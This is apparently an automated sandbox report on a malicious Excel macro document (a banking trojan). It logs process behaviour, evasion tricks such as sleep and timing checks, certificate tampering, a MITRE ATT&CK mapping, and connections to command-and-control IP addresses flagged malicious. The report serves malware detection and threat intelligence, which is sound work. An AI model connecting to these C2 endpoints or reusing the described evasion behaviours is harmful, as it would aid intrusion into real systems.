Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -328000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -287000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -155000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -245000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -317000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -350000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -325000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -342000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -564000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -174000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -333000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -320000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -263000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -305000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -247000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -268000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -285000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -344000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE TID: 2820	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_003CCEF8 FindFirstFileExW,

4_2_003CCEF8

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_003B3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,

4_2_003B3930

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_002388DD rdtsc

4_2_002388DD

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_003B6C50 LdrLoadDll,

4_2_003B6C50

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,

4_2_10002140

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0025B5D0 mov eax, dword ptr fs:[00000030h]		4_2_0025B5D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0025B6E0 mov eax, dword ptr fs:[00000030h]		4_2_0025B6E0

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_003B7A60 RtlAddVectoredExceptionHandler,

4_2_003B7A60

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 80.86.91.27 236	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 5.100.228.233 61	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 46.105.131.65 232	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 77.220.64.37 187	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 2456			Jump to behavior

Source: regsvr32.exe, 00000003.00000002.2392737510.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2392806725.00000000008C0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2392737510.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2392806725.00000000008C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2392737510.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2392806725.00000000008C0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_003B2980 GetUserNameW,

4_2_003B2980

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting22	Path Interception	Process Injection112	Masquerading11	OS Credential Dumping	Security Software Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting22	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Regsvr321	DCSync	System Network Configuration Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery14	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
INV8222874744_20210111490395.xlsm	43%	ReversingLabs	Script-Macro.Trojan.Remcos

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bjcbglsw.dll	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://5.100.228.233:3389/	0%	Avira URL Cloud	safe
https://5.100.228.233:3389/T	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://77.220.64.37/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://46.105.131.65:1512/t	0%	Avira URL Cloud	safe
https://46.105.131.65:1512/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://5.100.228.233:3389/7Q	0%	Avira URL Cloud	safe
https://80.86.91.27:3308/	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
media-server.skyinternet.com.pk	217.174.149.3	true	false		unknown
cdn.digicertcdn.com	104.18.10.39	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	false		high
https://5.100.228.233:3389/	regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2392699066.00000000004DF000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com	DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	false		high
https://5.100.228.233:3389/T	regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net03	regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://77.220.64.37/	regsvr32.exe, 00000004.00000002.2392732468.000000000050F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	false		high
https://46.105.131.65:1512/t	regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://46.105.131.65:1512/	regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	regsvr32.exe, 00000004.00000002.2393787843.00000000020C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2243298367.0000000003EA0000.00000002.00000001.sdmp	false		high
https://5.100.228.233:3389/7Q	regsvr32.exe, 00000004.00000002.2392699066.00000000004DF000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://80.86.91.27:3308/	regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	regsvr32.exe, 00000004.00000002.2393787843.00000000020C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2243298367.0000000003EA0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://ocsp.entrust.net0D	regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmp	false		high
http://servername/isapibackend.dll	regsvr32.exe, 00000003.00000002.2392785990.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2392840096.0000000001CC0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2238957386.0000000002310000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
217.174.149.3	unknown	Bulgaria	31083	TELEPOINTBG	false
5.100.228.233	unknown	Netherlands	8315	SENTIANL	true
80.86.91.27	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
46.105.131.65	unknown	France	16276	OVHFR	true
77.220.64.37	unknown	Italy	44160	INTERNETONEInternetServicesProviderIT	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338363
Start date:	12.01.2021
Start time:	07:42:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	INV8222874744_20210111490395.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.expl.evad.winXLSM@9/23@1/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 4.9% (good quality ratio 4.8%) Quality average: 81.6% Quality standard deviation: 20%
HCA Information:	Successful, ratio: 89% Number of executed functions: 21 Number of non-executed functions: 59
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Found warning dialog Click Ok Found warning dialog Click Ok Attach to Office via COM Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 192.35.177.64, 93.184.221.240, 67.26.73.254, 8.253.95.249, 8.248.139.254, 8.253.95.121, 67.27.157.254, 104.42.151.234, 104.18.10.39 Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, wu.azureedge.net, watson.microsoft.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, blobcollector.events.data.trafficmanager.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/338363/sample/INV8222874744_20210111490395.xlsm

Simulations

Behavior and APIs

Time	Type	Description
07:42:52	API Interceptor	1721x Sleep call for process: regsvr32.exe modified
07:43:08	API Interceptor	510x Sleep call for process: DWWIN.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
217.174.149.3	22RFQ-SN PO1859082- Product list sheet.exe	Get hash	malicious	Browse	www.fahadsajjad.com/la/?9r=1s32RKhxSM5r5OBY21oGJgF7tYpevBQtjY1gcno/uy3lctFL4yzyHtIBou7DbnEva0j68xDPlZY/eEdRlbSl&ZFQdPr=Ip4tMf
5.100.228.233	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse
	xad05r9ba.dll	Get hash	malicious	Browse
	mcluc5u.dll	Get hash	malicious	Browse
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
80.86.91.27	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse
	xad05r9ba.dll	Get hash	malicious	Browse
	mcluc5u.dll	Get hash	malicious	Browse
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse
46.105.131.65	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse
	xad05r9ba.dll	Get hash	malicious	Browse
	mcluc5u.dll	Get hash	malicious	Browse
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse
	HkNkyKl3uT.dll	Get hash	malicious	Browse
	ceepq536n.zip.dll	Get hash	malicious	Browse
	sample20210111-01.xlsm	Get hash	malicious	Browse
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse
	hiytvys.dll	Get hash	malicious	Browse
	l7rgi3xyd.dll	Get hash	malicious	Browse
	ymuyks.dll	Get hash	malicious	Browse
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse
	hy9x6wzip.dll	Get hash	malicious	Browse
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse
	jufk0vrar.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.digicertcdn.com	Inv0209966048-20210111075675.xls	Get hash	malicious	Browse	104.18.11.39
	INV2680371456-20210111889374.xlsm	Get hash	malicious	Browse	104.18.10.39
	INV8073565781-20210111319595.xlsm	Get hash	malicious	Browse	104.18.11.39
	sample20210111-01.xlsm	Get hash	malicious	Browse	104.18.10.39
	INV3867196801-20210111675616.xlsm	Get hash	malicious	Browse	104.18.11.39
	INV9698791470-20210111920647.xlsm	Get hash	malicious	Browse	104.18.10.39
	INV7693947099-20210111388211.xlsm	Get hash	malicious	Browse	104.18.10.39
	SurfsharkSetup.exe	Get hash	malicious	Browse	104.18.10.39
	https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1	Get hash	malicious	Browse	104.18.10.39
	ASHLEY NAIDOO CV.doc	Get hash	malicious	Browse	104.18.10.39
	RFQ.doc	Get hash	malicious	Browse	104.18.10.39
	SecuriteInfo.com.Trojan.BtcMine.3311.17146.exe	Get hash	malicious	Browse	104.18.11.39
	http://test.kunmiskincare.com/index.php	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3D	Get hash	malicious	Browse	104.18.10.39
	https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3D	Get hash	malicious	Browse	104.18.11.39
	https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3D	Get hash	malicious	Browse	104.18.11.39
